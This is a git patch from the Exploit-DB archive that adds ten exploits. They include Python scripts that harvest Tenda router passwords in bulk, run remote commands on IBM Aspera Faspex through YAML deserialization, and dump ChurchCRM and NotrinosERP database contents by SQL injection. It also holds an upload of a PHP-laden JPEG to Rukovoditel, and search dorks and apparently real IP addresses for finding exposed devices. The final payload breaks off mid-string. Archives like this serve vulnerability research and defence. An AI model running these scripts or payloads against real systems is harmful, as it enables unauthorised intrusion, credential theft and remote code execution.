From 99cef8d064e7374e94232e9768abed7753b7eddb Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 8 Apr 2023 00:16:27 +0000 Subject: [PATCH] DB: 2023-04-08 11 changes to exploits/shellcodes/ghdb Snitz Forum v1.0 - Blind SQL Injection Franklin Fueling Systems TS-550 - Exploit and Default Password Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing MAC 1200R - Directory Traversal Docker based datastores for IBM Instana 241-2 243-0 - No Authentication IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE) ChurchCRM 4.5.1 - Authenticated SQL Injection NotrinosERP 0.7 - Authenticated Blind SQL Injection Rukovoditel 3.3.1 - Remote Code Execution (RCE) Wondershare Dr Fone 12.9.6 - Privilege Escalation --- exploits/asp/webapps/51323.txt | 24 ++++++ exploits/hardware/remote/51317.py | 108 +++++++++++++++++++++++++++ exploits/hardware/remote/51321.txt | 60 +++++++++++++++ exploits/hardware/webapps/51315.txt | 16 ++++ exploits/multiple/remote/51314.py | 87 ++++++++++++++++++++++ exploits/multiple/remote/51316.py | 110 ++++++++++++++++++++++++++++ exploits/php/webapps/51318.py | 88 ++++++++++++++++++++++ exploits/php/webapps/51319.py | 61 +++++++++++++++ exploits/php/webapps/51322.txt | 57 ++++++++++++++ exploits/windows/local/51324.txt | 51 +++++++++++++ files_exploits.csv | 10 +++ 11 files changed, 672 insertions(+) create mode 100644 exploits/asp/webapps/51323.txt create mode 100755 exploits/hardware/remote/51317.py create mode 100644 exploits/hardware/remote/51321.txt create mode 100644 exploits/hardware/webapps/51315.txt create mode 100755 exploits/multiple/remote/51314.py create mode 100755 exploits/multiple/remote/51316.py create mode 100755 exploits/php/webapps/51318.py create mode 100755 exploits/php/webapps/51319.py create mode 100644 exploits/php/webapps/51322.txt create mode 100644 exploits/windows/local/51324.txt diff --git a/exploits/asp/webapps/51323.txt b/exploits/asp/webapps/51323.txt new file mode 100644 index 000000000..a6c18b37d --- /dev/null +++ b/exploits/asp/webapps/51323.txt @@ -0,0 +1,24 @@ +# Exploit Title: Snitz Forum v1.0 - Blind SQL Injection +# Date: 13/03/2023 +# Exploit Author: Emiliano Febbi +# Vendor Homepage: https://forum.snitz.com/ +# Software Link: https://sourceforge.net/projects/sf2k/files/ +# Version: ALL VERSION +# Tested on: Windows 10 + +[code] +._ _______. +*/ ///______I +) . /_(_) +/__/ *0day PoC* + + +http://www.site.com/forum/cal.asp?date=25/03/2023 <= SQLi ??? + +http://www.site.com/forum/log.asp?log_id=3456 <= Blind SQLi #!WORK!# + +._________. +*/ ///______I +) . /_(_) +/__/*0day PoC End* +[/code] \ No newline at end of file diff --git a/exploits/hardware/remote/51317.py b/exploits/hardware/remote/51317.py new file mode 100755 index 000000000..63010cd32 --- /dev/null +++ b/exploits/hardware/remote/51317.py @@ -0,0 +1,108 @@ +#!/usr/bin/python3 + +# Exploit Title: Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing +# Shodan Dork: http.favicon.hash:-2145085239 http.title:"Tenda | LOGIN" +# Date: 09/03/2023 +# Exploit Author: @h454nsec +# Github: https://github.com/H454NSec/CVE-2020-35391 +# Vendor Homepage: https://www.tendacn.com/default.html +# Product Link: https://www.tendacn.com/product/f3.html +# Version: All +# Tested on: F3v3.0 Firmware (confirmed) +# CVE : CVE-2020-35391 + +import re +import os +import sys +import argparse +import base64 +import requests +import subprocess +try: + import mmh3 + import codecs +except ImportError: + print("[!] Install mmh3: pip3 install mmh3") + sys.exit() + +Color_Off="\033[0m" +Black="\033[0;30m" # Black +Red="\033[0;31m" # Red +Green="\033[0;32m" # Green +Yellow="\033[0;33m" # Yellow +Blue="\033[0;34m" # Blue +Purple="\033[0;35m" # Purple +Cyan="\033[0;36m" # Cyan +White="\033[0;37m" # White + +def ip_checker(ip): + if "/" in ip: + splited = ip.split("/") + if "http://" in ip or "https://" in ip: + return f"{splited[0]}://{splited[2]}" + else: + return f"http://{splited[0]}" + else: + return f"http://{ip}" + +def is_tenda(ip): + try: + response = requests.get(f'{ip}/favicon.ico') + favicon = codecs.encode(response.content, "base64") + favicon_hash = mmh3.hash(favicon) + if favicon_hash == -2145085239: + return True + return False + except Exception as error: + return False + +def password_decoder(data): + try: + for nosense_data in data.split("\n"): + if ("http_passwd=" in nosense_data): + encoded_password = nosense_data.split("=")[-1] + break + password_bytes = base64.b64decode(encoded_password) + password = password_bytes.decode("utf-8") + if (len(password) != 0): + return password + return False + except Exception as error: + return False + +def main(db): + for ip in db: + ip_address = ip_checker(ip) + tenda = is_tenda(ip_address) + header = print(f"{Green}[+]{Yellow} {ip_address}{Color_Off}", end="") if tenda else print(f"{Red}[-]{Yellow} {ip_address}{Color_Off}", end="") + try: + output = subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg -A '' -H 'Accept:' -H 'Host:' -s", shell=True) + data = output.decode('utf-8') + password = password_decoder(data) + if password: + if not os.path.isdir("config_dump"): + os.mkdir("config_dump") + with open(f"config_dump/{ip_address.split('/')[-1]}.cfg", "w") as o: + o.write(data) + with open(f"credential.txt", "a") as o: + o.write(f"{ip_address}|{password}\n") + print(f"{Purple}:{Cyan}{password}{Color_Off}") + else: + print() + except Exception as error: + print() + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('-i', '--ip', default='192.168.0.1', help='IP address of the target router (Default: http://192.168.0.1)') + parser.add_argument('-l', '--list_of_ip', help='List of IP address') + args = parser.parse_args() + db = [] + ip_list = args.list_of_ip + if ip_list: + with open(ip_list, "r") as fr: + for data in fr.readlines(): + db.append(data.strip()) + else: + db.append(args.ip) + main(db) \ No newline at end of file diff --git a/exploits/hardware/remote/51321.txt b/exploits/hardware/remote/51321.txt new file mode 100644 index 000000000..d4054d312 --- /dev/null +++ b/exploits/hardware/remote/51321.txt @@ -0,0 +1,60 @@ +# Exploit Title: Franklin Fueling Systems TS-550 - Exploit and Default Password +# Date: 3/11/2023 +# Exploit Author: parsa rezaie khiabanloo +# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) +# Version: TS-550 +# Tested on: Linux/Android(termux) + +Step 1 : attacker can using these dorks and access to find the panel + +inurl:"relay_status.html" + +inurl:"fms_compliance.html" + +inurl:"fms_alarms.html" + +inurl:"system_status.html" + +inurl:"system_reports.html' + +inurl:"tank_status.html" + +inurl:"sensor_status.html" + +inurl:"tank_control.html" + +inurl:"fms_reports.html" + +inurl:"correction_table.html" + +Step 2 : attacker can send request + +curl -H "Content-Type:text/xml" --data '' http://IP:10001/cgi-bin/tsaws.cgi + + +Step 3 : if get response that show like this + + + + + + + + + + +Step 4 : attacker can crack the hashesh using john the ripper + +notice : most of the panels password is : admin + +Disclaimer: +The information provided in this advisory is provided "as is" without +warranty of any kind. Trustwave disclaims all warranties, either express or +implied, including the warranties of merchantability and fitness for a +particular purpose. In no event shall Trustwave or its suppliers be liable +for any damages whatsoever including direct, indirect, incidental, +consequential, loss of business profits or special damages, even if +Trustwave or its suppliers have been advised of the possibility of such +damages. Some states do not allow the exclusion or limitation of liability +for consequential or incidental damages so the foregoing limitation may not +apply. \ No newline at end of file diff --git a/exploits/hardware/webapps/51315.txt b/exploits/hardware/webapps/51315.txt new file mode 100644 index 000000000..4aa0a8827 --- /dev/null +++ b/exploits/hardware/webapps/51315.txt @@ -0,0 +1,16 @@ +# Exploit Title: MAC 1200R - Directory Traversal +# Google Dork: "MAC1200R" && port="8888" +# Date: 2023/03/09 +# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd. +# Vendor Homepage: https://www.mercurycom.com.cn/ +# Software Link: https://www.mercurycom.com.cn/product-1-1.html +# Version: all versions. (REQUIRED) +# Tested on: all versions. +# CVE : CVE-2021-27825 + +1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888". +2. Open the affected website like "http://IP:8888/web-static/". +3. For example: +1)http://60.251.151.2:8888/web-static/ + +2)http://222.215.15.70:8888/web-static/ \ No newline at end of file diff --git a/exploits/multiple/remote/51314.py b/exploits/multiple/remote/51314.py new file mode 100755 index 000000000..dcd0d9ff3 --- /dev/null +++ b/exploits/multiple/remote/51314.py @@ -0,0 +1,87 @@ +# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication +# Google Dork: [if applicable] +# Date: 06 March 2023 +# Exploit Author: Shahid Parvez (zippon) +# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability +# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana +# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3) +# Tested on: [Mac os] +# CVE : CVE-2023-27290 +import argparse +import subprocess +import pexpect + +# Define the available options and their corresponding commands +COMMANDS = { + "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal", + "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'", + "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"', + "cockroach": "cockroach sql --host {host}:{port} --insecure", + "zookeeper": "echo dump |ncat {host} {port}", + "node-export": "curl http://{host}:{port}", + "elasticsearch": "curl http://{host}:{port}/_cat/indices?v", + "prometheus": "curl http://{host}:{port}/metrics", + "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"' +} + +# Define the parser for command-line arguments +parser = argparse.ArgumentParser(description="Script to run various commands on a host.") +parser.add_argument("host", help="The host IP address") +parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option") +parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)") +parser.add_argument("--output", help="Output the result to a file") +parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed") + +# Parse the command-line arguments +args = parser.parse_args() + +# Determine the port number to use +if args.port is None: + if args.option == "cassandra": + port = "9042" + elif args.option == "clickhouse": + port = "8123" + elif args.option == "cockroach": + port = "26257" + elif args.option == "elasticsearch": + port = "9200" + elif args.option == "kafka": + port = "9092" + elif args.option == "node-export": + port = "8181" + elif args.option == "prometheus": + port = "9090" + elif args.option == "zookeeper": + port = "2181" +else: + port = str(args.port) + +# Build the command to execute +command = COMMANDS[args.option].format(host=args.host, port=port) + +# Print the command line if verbose option is provided +if args.verbose: + print(f"Executing command: {command}") + +# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell +if args.option == "cassandra": + child = pexpect.spawn(command) + child.expect("Connected to.*", timeout=10) + child.interact() + output = child.before +elif args.option == "cockroach": + child = pexpect.spawn(command) + child.expect("root@.*:", timeout=10) + child.interact() + output = child.before +# If any other option is selected, execute the command and capture the output +else: + output = subprocess.check_output(command, shell=True) + +# If an output file is provided, write the output to the file +if args.output: + with open(args.output, "wb") as f: + f.write(output) + +# Print the output to the console +print(output.decode()) \ No newline at end of file diff --git a/exploits/multiple/remote/51316.py b/exploits/multiple/remote/51316.py new file mode 100755 index 000000000..71743644b --- /dev/null +++ b/exploits/multiple/remote/51316.py @@ -0,0 +1,110 @@ +# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE) +# Date: 02/02/2023 +# Exploit Author: Maurice Lambert +# Vendor Homepage: https://www.ibm.com/ +# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex +# Version: 4.4.1 +# Tested on: Linux +# CVE : CVE-2022-47986 + +""" +This file implements a POC for CVE-2022-47986 +an YAML deserialization that causes a RCE in +IBM Aspera Faspex (before 4.4.2). +""" + +__version__ = "1.0.0" +__author__ = "Maurice Lambert" +__author_email__ = "mauricelambert434@gmail.com" +__maintainer__ = "Maurice Lambert" +__maintainer_email__ = "mauricelambert434@gmail.com" +__description__ = """ +This file implements a POC for CVE-2022-47986 +an YAML deserialization that causes a RCE in +IBM Aspera Faspex (before 4.4.2). +""" +license = "GPL-3.0 License" +__url__ = "https://github.com/mauricelambert/CVE-2022-47986" + +copyright = """ +CVE-2022-47986 Copyright (C) 2023 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. +""" +__license__ = license +__copyright__ = copyright + +__all__ = [] + +print(copyright) + +from urllib.request import urlopen, Request +from sys import argv, exit, stderr, stdout +from shutil import copyfileobj +from json import dumps + +def main() -> int: + + if len(argv) != 3: + print("USAGES:", argv[0], "[hostname] [command]", file=stderr) + return 1 + + copyfileobj( + urlopen( + Request( + argv[1] + "/aspera/faspex/package_relay/relay_package", + method="POST", + data=dumps({ + "package_file_list": [ + "/" + ], + "external_emails": f""" +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "pew" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:PrettyPrint + output: !ruby/object:Net::WriteAdapter + socket: &1 !ruby/module "Kernel" + method_id: :eval + newline: "throw `{argv[2]}`" + buffer: {{}} + group_stack: + - !ruby/object:PrettyPrint::Group + break: true + method_id: :breakable +""", + "package_name": "assetnote_pack", + "package_note": "hello from assetnote team", + "original_sender_name": "assetnote", + "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", + "metadata_human_readable": "Yes", + "forward": "pew", + "metadata_json": '{}', + "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", + "delivery_sender_name": "assetnote", + "delivery_title": "TEST", + "delivery_note": "TEST", + "delete_after_download": True, + "delete_after_download_condition": "IDK", + }).encode() + ) + ), + stdout.buffer, + ) + + return 0 + + +if __name__ == "__main__": + exit(main()) \ No newline at end of file diff --git a/exploits/php/webapps/51318.py b/exploits/php/webapps/51318.py new file mode 100755 index 000000000..3937cbf6e --- /dev/null +++ b/exploits/php/webapps/51318.py @@ -0,0 +1,88 @@ +# Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection +# Date: 11-03-2023 +# Exploit Author: Arvandy +# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md +# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7 +# Vendor Homepage: https://notrinos.com/ +# Version: 0.7 +# Tested on: Windows, Linux +# CVE: CVE-2023-24788 + +""" +The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. +This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order. +The OrderNumber parameter require a valid orderNumber value. + +This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application. +""" + + +import sys, requests + +def injection(target, inj_str, session_cookies): + for j in range(32, 126): + url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j))) + headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} + r = requests.get(url, headers=headers) + res = r.text + if "NotrinosERP 0.7 - Login" in res: + session_cookies = login(target, username, password) + headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} + r = requests.get(url, headers=headers) + elif (r.elapsed.total_seconds () > 2 ): + return j + return None + +def login(target, username, password): + target = "%s/index.php" % (target) + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password) + s = requests.session() + r = s.post(target, data = data, headers = headers) + return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781') + +def retrieveDBName(session_cookies): + db_name = "" + print("(+) Retrieving database name") + for i in range (1,100): + injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i + retrieved_value = injection(target, injection_str, session_cookies) + if (retrieved_value): + db_name += chr(retrieved_value) + else: + break + print("Database Name: "+db_name) + +def retrieveDBVersion(session_cookies): + db_version = "" + print("(+) Retrieving database version") + for i in range (1,100): + injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i + retrieved_value = injection(target, injection_str, session_cookies) + if (retrieved_value): + db_version += chr(retrieved_value) + sys.stdout.flush() + else: + break + print("Database Version: "+db_version) + +def main(): + print("(!) Login to the target application") + session_cookies = login(target, username, password) + + print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") + retrieveDBName(session_cookies) + print("") + retrieveDBVersion(session_cookies) + +if __name__ == "__main__": + if len(sys.argv) != 4: + print("(!) Usage: python3 exploit.py ") + print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass") + sys.exit(-1) + + target = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + + main() \ No newline at end of file diff --git a/exploits/php/webapps/51319.py b/exploits/php/webapps/51319.py new file mode 100755 index 000000000..9098d61dc --- /dev/null +++ b/exploits/php/webapps/51319.py @@ -0,0 +1,61 @@ +# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection +# Date: 11-03-2023 +# Exploit Author: Arvandy +# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md +# Software Link: https://github.com/ChurchCRM/CRM/releases +# Vendor Homepage: http://churchcrm.io/ +# Version: 4.5.1 +# Tested on: Windows, Linux +# CVE: CVE-2023-24787 + +""" +The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter. +This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. +The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping. +This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. + +This script is created as Proof of Concept to retrieve the username and password hash from user_usr table. +""" + + +import sys, requests + +def dumpUserTable(target, session_cookies): + print("(+) Retrieving username and password") + print("") + url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target) + headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} + r = requests.get(url, headers=headers) + lines = r.text.splitlines() + + for line in lines: + if "Perseverance" in line: + print(line.split("Perseverance")[1].split("")[0]) + +def login(target, username, password): + target = "%s/session/begin" % (target) + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + data = "User=%s&Password=%s" % (username, password) + s = requests.session() + r = s.post(target, data = data, headers = headers) + return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') + +def main(): + print("(!) Login to the target application") + session_cookies = login(target, username, password) + + print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash") + dumpUserTable(target, session_cookies) + + +if __name__ == "__main__": + if len(sys.argv) != 4: + print("(!) Usage: python3 exploit.py ") + print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") + sys.exit(-1) + + target = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + + main() \ No newline at end of file diff --git a/exploits/php/webapps/51322.txt b/exploits/php/webapps/51322.txt new file mode 100644 index 000000000..220faad5c --- /dev/null +++ b/exploits/php/webapps/51322.txt @@ -0,0 +1,57 @@ +Exploit Title: Rukovoditel 3.3.1 - Remote Code Execution (RCE) +Version: 3.3.1 +Bugs: rce via jpeg file upload +Technology: PHP +Vendor URL: https://www.rukovoditel.net/ +Software Link: https://www.rukovoditel.net/download.php +Date of found: 12-03-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +#First of all, we need to inject the php codes into the metadata of any jpeg file with exiftool. (for example) + +exiftool -overwrite_original -comment="" index.jpeg +exiftool -overwrite_original -DocumentName="" index.jpeg + +#after that we need to get the base64 code of the image (i used this site) + https://h3yy0.csb.app/ + + + +#and we have to do url encoding + + +#now we have to upload profile photo + +Poc request (I changed the file name to hello.php and and pasted our base 64 code) + + + +POST /index.php?module=users/photo&action=save&token=34GtgxfEmO HTTP/1.1 +Host: localhost +Content-Length: 9567 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +sec-ch-ua-platform: "Linux" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/index.php?module=users/account +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cookie_test=please_accept_for_session; sid=0d3esjp74uo3q3gp38r044vc9h; sidebar_closed=1 +Connection: close + +img=data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4QB4RXhpZgAATU0AKgAAAAgABQENAAIAAAAWAAAASgEaAAUAAAABAAAAYAEbAAUAAAABAAAAaAEoAAMAAAABAAEAAAITAAMAAAABAAEAAAAAAAA8P3BocCBlY2hvICdzYWxhbScgPz4AAAAAAQAAAAEAAAABAAAAAf%2F%2BABU8P3BocCBwaHBpbmZvKCk7ID8%2B%2F9sAhAAJBgcSEhIVExMTFRUVFRYXFxUVFhUVFhgWFhUVFhYVFRUVGB0oIBgaJR0VFSExISUpKy4uLhcfMzgzLTcoLS4rAQoKCg4NDhoQEBstJR8lLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS3%2FwAARCAEqAKkDASIAAhEBAxEB%2F8QAGwAAAgMBAQEAAAAAAAAAAAAABAUCAwYBBwD%2FxAA8EAABAwIEAwYFAgUDBAMAAAABAAIRAyEEEjFBBVFhBiJxgZGhE7HB0fAy4RQjQlJiB3LxFVOCkhYz0v%2FEABkBAAMBAQEAAAAAAAAAAAAAAAECAwQABf%2FEACMRAAICAwEBAAICAwAAAAAAAAABAhEDITESQSJRE3EEMmH%2F2gAMAwEAAhEDEQA%2FAMhSCvYFVSaiWNWA2k2IqmFQxqJphBjIuYFcxqqar6YU2URYwK0NX1MKxKxkVOCFrBGuCFroBFWJSPHp5iSkePKrAnPhn8UhgisUhVsjwxS6fFRcplQcmQpWVxi6V1iYAVRCMphC0AjaYUpDom0KUL4BSShHdFFMQlNXscos0BLArmIdhV7CgFBNMIqmxDUkXSSMoi5rVbCraFNIxkQqIDEFGVXJfiCgEW4pyRY5yc4spFjSq4yWQT4hDq%2BsqFsXDEzpUCplQKZAKypUwolTpJgBtAIxgQtAIxgUWOiYCkvgF2EoRswq1qrYrmBSNBbTKJpqhgRNMJWFF9IIukEPSCJppGUQS0LjwuNXXJRkDVSgayPqIGuuCKsWkWNT7FpFjVXGRyCeqqSr6qoK2Ixs%2BUSpKLkUAqKtpBVlXUQiwINoBGMCGoBFtCkyiJBdhdC%2BSnDemiGBDsRFNRNBewIhiopq9oQYyCKaKpCUJTCYUWhoBO%2Bg%2BvgkodFnwiBOyi5dGOI0Fuu%2BiJyNfZtn8v6b6X2XOP6G2uiyqga6YVxFjql2IKUIrxZSPGJ1i3JJiyrYyOQVVkO5E1UO5a0Y2cUSpqLkUAqKIohUImgEWBB1AItoQ1AIpoUWURJfKQC%2BylA4bU1cxUMKuYVE0BNNEU0KwoikUGMg2gyfAXPgrcRVJv8AkbBcayAG8wHO8%2F0j6%2BaBxmLuYS1bovDSsJa46%2Fn5ZMcI0Nk7xcCJ8JSDDYq48dFsMNTytBy5Z1dmHzta0W5rTHHojPJQDjaeemH6uaBmkQSJgEjnokGIC1mJGQjdryQZtqI5m%2F5ssxj6Ra4tOxj91myKpDxdoR4wJLignWLSbEp8ZLILKqHciqg1Qz1qRkZEKJXVwpgEAiqAQ7GE7J5wjg1SpBIyt5nfwG6EmGKb4Qw7Z0Wt4B2PrVyC4FjT%2FwC0fRabsh2PY0B7h4E6nr0W6%2BG1ggAKDlfC6xpdMxg%2ByOHo3LQTzN%2Fmiv4DD%2F2N9ArOLYsCBE5vy6F%2BC78Kk3bNChS3o80arWKDArmBMSLWImkEOwImiLhKEN4jVyueOsDwFh8knxZBumPG3RUd4yPO%2FwBVnMXioF0yjtmi7ii2li8jpWx4Bxb4gykw7WMhqA%2FXSNF50yuC4X3%2FACStnwfE0gA2mXPdF%2FhkwP8AyJv42C1QRmymmxp7plvgQ076TMTe6Q46iajQ4fqbZw6bHy09ETVxThIdL7Gx29CSleHxZD80WM5m8wbO9ZlZ8sdjYnoDrcIqOmIS%2FF9na2wB81r3jK8NFxFp3B0KhVfJndGMa4JJ30wFbs%2FXE9wqqh2crvdlyGSJE9F6EcWGgjddxGJjK5pgxrsqJknBGOZ2HqhhLjDpAA%2BcrlLsqxpPxX2GwTrGceeJB1Wfo4t9V8CSSYHqklNlIYl9HGHFMRTpUxOgMSfFbfs72ciKlW51A%2B6H7K9nxT77oc%2F5dAtc2dlFS9F2lHgSx0aQqsc4ZC7yI%2FPy6Ar1BeLHzS%2BrxJ4BaTM9U%2F8AIoqmCOFt2gPG4oMFWsb%2FAAmy3q42bPnHovPf%2Bt4n%2FuuWi7b4rJTpUQYL%2FwCZU8JhgPuVjYRxxpEf8ifqf9DVhVzSh2K1pShCWFGYJsuA5lAsRuHOVwifwLvoxXTpZy8uJysFiTvoB8lj%2BMVxnMGwWp4szLRYN3Brj5idPArHYtsPE3Gn2VYr4P6%2Bjbs%2FwxtbvPIa3rv4D6rWMxNGk0MpjSLC2m7haVluH4ZzZOWzhEGQJEEB0XjWyfMqOs0tjLAd3ctzoZ0ynQEclZaM0nbLzWLgY535np4IOuCDOm33Tvh2EDiJ7rh%2Btuo6OHQ3XOJcPgdPlp9VLJwbHLZRWr5zTI5RPgNlB7h8R7TItIPKRKpwlKInY36QHTPomGMDXUnP2gt87%2FQhSjKiskAurTGYXiD%2BeqXY6o6iCDdp9p0PoQp06hhoPJve%2BR%2Bc9Aqs09xxmC5hB%2Ftgwm9C0KsnxJMnaPBc7JvLcSwRuZ80x4ZhmuDmaFs%2BcbfNNMHwkBwezUjRSnLVFILZvsA0QIPzRxa78ulfB2d2%2FJGGoWAmDHqhi4Ge2DcQxDmiImdOfql%2FD8Nmcc2ky48gLm6YDHseQMw1u0iEk%2F1AxJosLKboDyAYtaJKMoqT%2FwCD%2B3jg9bMNx7HGtXqP2LiG9GizQPJLoUiFyFc84ZtVjVUCptUzQE0dUZkJe07BB4YSUfmRSs6xZ2jxUv8AID2Snh%2BDNV8TA8BcHWAdUXxDCPqP%2Bf7lMcDhPhiD5J72df40MMLhW5cpAkWI52gEctijsPYlp7wI7s8jEtPT88A6T9Drt7osFG7J0X0AAQRb80K5iq8gjxHqNl83QIV93X5%2BxsfeChJ6pjRX0WYqq5shsmYA6g5QYHt6q11eKFSmYBDh7getw72VtOO5a9p6ET%2F%2BVXWw4NzoSHR07zr%2BsJFEpYFw2kXYeSNHFt%2BQdb3EeapxlGHtcLjfmRpJ8reStocRyVfhx3bevdd6zKKxjJLdg5pHnAc0%2B8IPQVsAxWHdSxIqCcj4vyJABB8fqthgoLmiJEfMD7FLa9djKbA%2B%2BYWnmIP2THAPhwgzYX6H%2Fg%2BqlPY8TS4BgIBj82RteiHiNuiowzIty%2B10a1yC0hW9ifFcMZT73t91lP8AU%2BoIoN%2FqcC4%2BwC2%2BIMvaOsn7LzDt%2FXc%2FFunQABvQDknx9FytuOzNLikuK5lGIVjQoBWNKmaA7h9GTPJEuYQvsGMrR1XcQ9E4pdIQ76hJ%2FPmu1H9ZVbKU8vzkdkAltOqR9fumuCOa2qW0KAP0kX9d05wbYCZAZe0QIQVZ0GdPzRFvJOirfh51XM5I%2BwNBrjprBBG17%2FMoTizfhSIs6b9M7XT7lEYQPpOtBHK3nBV%2Fal7X0Wm1nRP%2B5swfzZcn%2BJzX5IUcR4WKlJ1Zgu2XjqWy75W9EMaxNKm8%2FwBAg9CCNfULQ9kW56UO3%2BRMGfRKuM4AsFfZs%2FEbyyklnyLUJbVhi90U8c71TDU9QWyPIAfJo9Vp8LhhTLfAfQfRZPgwdUrYcn%2BhnvafcStpxxuSmx4mxA8Z%2FwCR6JWtDXuh1h%2F0g87%2FAGRLXSEPg%2B%2FRkakeiswtPKLlJKL%2BHJkKreaw3%2BouAPcqgCNCd1vHtk6FKu1WCz4WoInKJHklhakdPcTx5fLpXFqMg8%2FhlKnRuE2NBVmnCUqiis8NCHrVSfz2Usc09UtfiHN6hcOE1JOinh6bvuVU3GsIuYI5i6ErY92bue6NIGzQ4Yhv5KPbWA3CyNKvWcYhN8Lw9x1cUrGSHT8fSZ%2Bp%2BX83Vdfi1Bl8r3E7kEeFiRHqhW020qlJ7mh4ZUu0%2FwBXddYyOcJFx%2BsRSqO1cAcvibSEXukmdajbaHv%2FAMloudDpadJiI%2Bf2XeNvNSmWNIMnNaYBymSPH6pLjeGNfh3VDYtygbXIM%2FIJd2X4o8PFN5JABif7QYA%2BaXy2hlOJt%2BzLXNbF7WPOdIHXXy8UZ2ieH06otGXJ5Dl5%2FJLaeIygHwP7np08FKpWmmZN5%2FYT5R6ITTSo6FN2JOzlU52nkI00IsfZekcTp%2FEoOtNrdSPxywXZzAuJcRp6zAXpLyKNJpcL2DRzPKErl0PnaYPwkFmHaCIJvH